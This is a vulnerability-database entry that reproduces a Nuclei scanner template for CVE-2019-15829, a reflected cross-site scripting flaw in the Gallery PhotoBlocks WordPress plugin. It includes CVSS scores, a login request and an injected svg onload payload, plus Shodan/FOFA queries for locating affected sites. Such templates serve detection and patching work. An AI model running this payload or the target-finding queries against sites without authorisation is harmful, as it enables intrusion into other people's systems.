Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2019-15829
HistoryOct 17, 2023 - 7:20 a.m.

Gallery Photoblocks < 1.1.43 - Cross-Site Scripting

2023-10-1707:20:28
ProjectDiscovery
github.com
1
cve
cross-site scripting
wordpress
plugin
photoblocks-gallery
authenticated
wpscan
greentreelabs

3.5 Low

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

SINGLE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:S/C:N/I:P/A:N

4.8 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

HIGH

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

50.9%

The Gallery PhotoBlocks WordPress plugin was affected by an Authenticated Reflected XSS security vulnerability.
id: CVE-2019-15829

info:
  name: Gallery Photoblocks < 1.1.43 - Cross-Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    The Gallery PhotoBlocks WordPress plugin was affected by an Authenticated Reflected XSS security vulnerability.
  remediation: Fixed in 1.1.43
  reference:
    - https://wpscan.com/vulnerability/b8d1d88e-f2e5-4212-af34-c91f563f07b6/
    - https://nvd.nist.gov/vuln/detail/CVE-2019-15829
    - https://wordpress.org/plugins/photoblocks-grid-gallery/
    - https://wordpress.org/plugins/photoblocks-grid-gallery/#developers
    - https://wpvulndb.com/vulnerabilities/9443
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 4.8
    cve-id: CVE-2019-15829
    cwe-id: CWE-79
    epss-score: 0.00146
    epss-percentile: 0.50525
    cpe: cpe:2.3:a:greentreelabs:gallery_photoblocks:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: greentreelabs
    product: gallery_photoblocks
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/photoblocks-grid-gallery/
    fofa-query: body=/wp-content/plugins/photoblocks-grid-gallery/
    publicwww-query: "/wp-content/plugins/photoblocks-grid-gallery/"
  tags: cve,cve2019,wp,wordpress,wp-plugin,photoblocks-gallery,xss,authenticated,wpscan,greentreelabs

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-admin/admin.php?page=photoblocks-edit&id=%22%3E%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(body_2, "<svg/onload=alert(document.domain)>")'
          - 'contains(body_2, "post galleries!")'
        condition: and
# digest: 490a004630440220137550dc2b3b93e1d4e9d098fca719732cf3f6ba8a01b17f88ffab99f8bcb96e02202dfa67c0a99887aeffabe6cec4a3c83d84ea32d4b631b9d9ef5d923fe6013f59:922c64590222798bb761d5b6d8e72950

3.5 Low

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

SINGLE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:S/C:N/I:P/A:N

4.8 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

HIGH

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

50.9%

Related for NUCLEI:CVE-2019-15829